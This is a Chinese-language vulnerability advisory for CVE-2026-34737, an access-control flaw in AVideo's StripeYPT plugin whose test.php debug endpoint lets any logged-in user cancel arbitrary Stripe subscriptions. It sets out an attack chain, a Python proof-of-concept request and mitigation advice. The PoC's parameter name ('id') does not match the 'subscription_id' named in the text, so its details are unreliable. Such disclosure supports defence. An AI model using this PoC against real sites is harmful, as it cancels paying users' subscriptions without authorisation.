CVE-2026-34737 CVSS 6.5 中危

CVE-2026-34737: AVideo StripeYPT插件越权漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34737

漏洞类型

访问控制错误

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo开源视频平台的StripeYPT插件存在权限绕过漏洞。在26.0及之前版本中，该插件的test.php调试端点未实施严格的权限校验，导致任何已登录用户均可访问。由于内部处理订阅的函数逻辑错误，攻击者可利用该接口通过提供订阅ID，非法取消任意Stripe订阅，严重影响业务完整性。

技术细节

该漏洞的根本原因在于StripeYPT插件中的权限控制机制缺失以及业务逻辑实现错误。首先，插件包含的test.php文件是一个用于调试Stripe Webhook处理的端点。开发者在部署时未对该文件进行适当的访问控制限制，导致系统中的低权限用户（甚至普通注册用户）均可直接访问此敏感接口。其次，该端点在处理请求时调用了retrieveSubscriptions()方法。根据漏洞描述，该方法存在严重的逻辑缺陷，它并未按照预期仅查询订阅信息，而是在接收到特定参数（如订阅ID）时，直接执行了取消订阅的操作。攻击者只需向该端点发送一个包含目标subscription_id的HTTP POST请求，即可触发后台逻辑向Stripe API发送取消指令。由于无需管理员权限且无需用户交互，该漏洞极易被利用，导致受害者服务中断。

攻击链分析

STEP 1

侦察与认证

攻击者识别出目标运行的是WWBN AVideo平台，并使用普通用户账号登录系统，获取有效的会话Cookie。

STEP 2

识别端点

攻击者发现StripeYPT插件目录下存在`test.php`调试接口，并确认该接口未对普通用户进行访问限制。

STEP 3

构造载荷

攻击者构造一个包含目标Stripe订阅ID（subscription_id）的POST请求数据包。

STEP 4

执行漏洞利用

攻击者向`test.php`发送恶意请求，服务器端`retrieveSubscriptions()`方法错误地执行了取消操作。

STEP 5

达成影响

目标订阅被系统取消，导致付费用户服务中断，造成业务完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable endpoint
url = "http://target-site/plugin/StripeYPT/test.php"

# Attacker's session cookie (obtained after logging in as a regular user)
cookies = {
    "PHPSESSID": "attacker_session_id_here"
}

# Payload data simulating a subscription cancellation
# The 'id' field represents the target Stripe Subscription ID to cancel
payload = {
    "id": "sub_1abc123xyz"  # Replace with a valid subscription ID
}

try:
    # Send POST request to the vulnerable endpoint
    response = requests.post(url, data=payload, cookies=cookies)

    # Check response status
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if subscription was cancelled.")
        print("[+] Response:", response.text)
    else:
        print("[-] Failed to send request. Status code:", response.status_code)

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

由于目前没有公开的补丁，建议立即通过Web服务器配置（如Nginx或Apache的IP限制规则）限制对`/plugin/StripeYPT/test.php`路径的访问，或者直接从生产服务器中删除该调试文件，以阻断攻击路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表